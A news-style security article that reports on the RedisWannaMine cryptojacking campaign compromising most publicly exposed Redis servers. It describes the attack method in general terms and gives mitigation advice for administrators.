Surge in Attacks Targeting Open Redis Servers
Recent developments in cybersecurity have revealed a significant threat to organizations utilizing open Redis servers. Nearly two months after researchers issued warnings, a malware campaign specifically targeting these servers has escalated alarmingly, compromising at least 75% of publicly accessible Redis instances.
Redis, short for REmote DIctionary Server, is a well-known open-source data structure tool widely used for its capabilities as an in-memory distributed database, message broker, and cache. A key vulnerability arises from its design, as it is meant to be accessed in trusted environments rather than being exposed on the internet.
The malware, referred to as RedisWannaMine, initially came to light in late March when the data center security vendor Imperva reported that it could deploy a cryptocurrency mining script on targeted servers, impacting both database and application layers. The firm characterized this cryptojacking threat as unusually sophisticated, employing evasion techniques and worm-like behavior to maximize infection rates.
According to a recent report by Imperva, a staggering three-quarters of open Redis servers available over the internet via port 6379 contain malicious key-value pairs in memory. This revelation underscores ongoing difficulties faced by administrators in securing their systems, despite repeated warnings regarding these vulnerabilities. Data collected by Imperva’s honeypot servers indicates that 68% of compromised systems used keys labeled “backup1, backup2, backup3,” with a significant portion of attacks originating from a medium-sized botnet predominantly located in China.
The malicious actors behind these attacks are utilizing compromised Redis servers as proxies to scan for additional vulnerabilities across other websites. Techniques employed include SQL injection, cross-site scripting, malicious file uploads, and remote code execution. The methodology for this attack involves setting a harmful key-value pair in memory and creating a file in the /etc/crontabs directory that executes commands without the server owner’s consent.
Nadav Avital, the security research team leader at Imperva, explains that attackers typically plant values that contain commands to download external resources, which can facilitate further access. Another common tactic involves inserting SSH keys to secure remote access to the compromised machines.
To mitigate risks, administrators are strongly advised to restrict internet exposure for their Redis servers. When it is necessary to enable external access, implementing robust authentication mechanisms is crucial to prevent unauthorized infiltration. Additionally, due to Redis’s lack of encryption and the plaintext storage of its data, sensitive information should never be stored on these servers.
Avital emphasizes the frequent security lapses that occur when organizations fail to read proper documentation, particularly when migrating services to the cloud. Such oversights can lead to vulnerabilities that malicious actors readily exploit.
As businesses increasingly adopt cloud-based services, understanding and implementing effective security practices is paramount. Organizations must remain vigilant in safeguarding their systems from persistent threats, ensuring that they are not only aware but also prepared to defend against evolving cyberattack methodologies.
